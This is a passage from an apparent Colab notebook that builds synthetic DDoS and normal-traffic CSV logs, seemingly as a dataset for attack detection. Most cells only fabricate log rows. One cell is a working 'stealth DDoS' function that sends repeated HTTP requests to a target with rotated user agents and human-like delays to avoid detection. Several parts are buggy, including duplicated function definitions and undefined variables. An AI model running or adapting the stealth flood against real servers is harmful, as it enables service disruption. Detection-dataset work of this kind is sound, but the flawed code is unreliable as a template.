        timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
        src_ip = random.choice(common_public_ips)  # Random botnet IPs
        dst_ip = target_ip
        src_port = random.randint(1024, 65535)
        dst_port = target_port if random.choice(protocols) in ["TCP", "UDP"] else None  # No port for ICMP
        protocol = random.choice(protocols)  # Randomized protocol per packet
        packet_size = random.randint(64, 1024)  # Higher variability in size
        attack_type = random.choice(attack_types)  # Randomized attack method

        attack_data.append([timestamp, attack_type, src_ip, dst_ip, src_port, dst_port, protocol, packet_size])

        time.sleep(random.uniform(0.005, 0.02))  # More variation in delays to mimic a real botnet attack

    return attack_data

# Function to save attack logs to CSV

def save_attack_logs(logs, filename, folder="/content/drive/MyDrive/Attack Sim files"):
  """
  Saves attack logs to a specified Google Drive folder.

  Parameters:
      logs (list): The attack log data.
      filename (str): The name of the CSV file.
      folder (str): The Google Drive directory where the file will be saved.
  """
  # Ensure the directory exists
  os.makedirs(folder, exist_ok=True)

  # Full path to save the file
  save_path = os.path.join(folder, filename)

  # Save logs to CSV
  with open(save_path, mode="w", newline="") as file:
    writer = csv.writer(file)
    writer.writerow(["Timestamp", "Attack Type", "Source IP", "Destination IP", "Source Port", "Destination Port", "Protocol", "Packet Size"])
    writer.writerows(logs)

  print(f"Saved attack log: {save_path}")

# Function to find the next available filename in Google Drive
def get_next_filename(folder, base_filename):
  """
  Finds the next available filename by incrementing the file number.
  Example: "attack_log_1.csv", "attack_log_2.csv", etc.
  """
  os.makedirs(folder, exist_ok=True)  # Ensure directory exists
  file_number = 1
  while os.path.exists(os.path.join(folder, f"{base_filename}_{file_number}.csv")):
    file_number += 1
  return os.path.join(folder, f"{base_filename}_{file_number}.csv")

def save_attack_logs(logs, filename):
    folder = "/content/drive/MyDrive/Packet Flood Attack Sim"  # Local save directory
    os.makedirs(folder, exist_ok=True)  # Ensure the directory exists
    save_path = get_next_filename(folder, filename)

    with open(save_path, mode="w", newline="") as file:
        writer = csv.writer(file)
        writer.writerow(["Timestamp", "Attack Type", "Source IP", "Destination IP", "Source Port", "Destination Port", "Protocol", "Packet Size"])
        writer.writerows(logs)

    print(f"Saved attack log: {save_path}")

# Generate packet flood attack logs
simple_packet_flood_logs = generate_simple_packet_flood(1000)
medium_packet_flood_logs = generate_medium_packet_flood(1000)
complex_packet_flood_logs = generate_complex_packet_flood(1000)

# Combine all logs
all_packet_flood_logs = simple_packet_flood_logs + medium_packet_flood_logs + complex_packet_flood_logs

# Save each attack type separately
save_attack_logs(simple_packet_flood_logs, "simple_packet_flood.csv")
save_attack_logs(medium_packet_flood_logs, "medium_packet_flood.csv")
save_attack_logs(complex_packet_flood_logs, "complex_packet_flood.csv")

# Save all logs together
save_attack_logs(all_packet_flood_logs, "combined_packet_flood.csv")

# Display the dataset preview
df_packet_flood = pd.DataFrame(all_packet_flood_logs, columns=["Timestamp", "Attack Type", "Source IP", "Destination IP", "Source Port", "Destination Port", "Protocol", "Packet Size"])
print(df_packet_flood.head())


Saved attack log: /content/drive/MyDrive/Packet Flood Attack Sim/simple_packet_flood.csv_1.csv
Saved attack log: /content/drive/MyDrive/Packet Flood Attack Sim/medium_packet_flood.csv_1.csv
Saved attack log: /content/drive/MyDrive/Packet Flood Attack Sim/complex_packet_flood.csv_1.csv
Saved attack log: /content/drive/MyDrive/Packet Flood Attack Sim/combined_packet_flood.csv_1.csv
                    Timestamp       Attack Type    Source IP Destination IP  \
0  2025-03-19 21:20:36.306995  Simple SYN Flood  192.168.1.1  192.168.1.100   
1  2025-03-19 21:20:36.309891  Simple SYN Flood  192.168.1.1  192.168.1.100   
2  2025-03-19 21:20:36.312077  Simple SYN Flood  192.168.1.1  192.168.1.100   
3  2025-03-19 21:20:36.315311  Simple SYN Flood  192.168.1.1  192.168.1.100   
4  2025-03-19 21:20:36.320036  Simple SYN Flood  192.168.1.1  192.168.1.100   

   Source Port  Destination Port Protocol  Packet Size  
0        57180              80.0      TCP           64  
1        20915              

# Normal Network Traffic Generation

## Brennan Algorithmic Subsection

In [ ]:
import random
from datetime import datetime

# Common ISP IPs
isp_ips = [
    "72.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),  # Comcast
    "98.{}.{}.{}".format(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),  # AT&T
    "192.157.{}.{}".format(random.randint(0, 255), random.randint(0, 255))  # Verizon
]

# Function to simulate normal network traffic
def generate_normal_network_traffic(num_packets=1000):
    logs = []
    for _ in range(num_packets):
        timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
        src_ip = random.choice(isp_ips)  # Simulating ISP users
        dst_ip = "192.168.1.100"
        src_port = random.randint(1024, 65535)
        dst_port = random.choice([80, 443, 53, 22])  # HTTP, HTTPS, DNS, SSH
        protocol = random.choice(["TCP", "UDP"])
        packet_size = random.randint(64, 1500)  # Varying sizes
        logs.append([timestamp, "Normal Traffic", src_ip, dst_ip, src_port, dst_port, protocol, packet_size])

        time.sleep(random.uniform(0.2, 2))  # Simulating human-like delays

    return logs

# Generate normal traffic logs
normal_network_logs = generate_normal_network_traffic(1000)

### Advanced Algorithm for stealth DDoS attacks
- this block might need to be implemented into our attacks to make it as sophisticated as possible

In [ ]:
import requests
import random
import time

# Target website
target_url = "http://192.168.1.100"

# User-Agent Strings
user_agents = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/91.0.4472.124",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Firefox/89.0",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X)"
]

# Stealth Function
def stealth_ddos(num_requests=1000):
    for _ in range(num_requests):
        user_agent = random.choice(user_agents)
        delay = random.uniform(0.67584, 5)  # Human-like delays

        try:
            requests.get(target_url, headers={"User-Agent": user_agent})
        except:
            pass

        time.sleep(delay)  # Make attack look real

stealth_ddos(1000)

### Dataset Splicing
- Controlling attack intensity by using time-based Mixing

In [ ]:
import numpy as np

# Create timestamps where attack intensity increases over time
timestamps = np.linspace(1, 10, num=len(ddos_logs))  # Scale from 1 to 10 seconds

# Weighting for intensity
attack_intensity = np.sin(np.linspace(0, np.pi, len(ddos_logs)))  # Mimics gradual attack buildup

# Scale intensity to shuffle normal vs. attack traffic at different phases
weighted_logs = [(attack_intensity[i], log) for i, log in enumerate(ddos_logs + normal_traffic_logs)]
weighted_logs.sort()  # Orders them based on attack intensity (early = normal, later = peak attack)

# Extract only logs (removing weights)
final_logs = [log[1] for log in weighted_logs]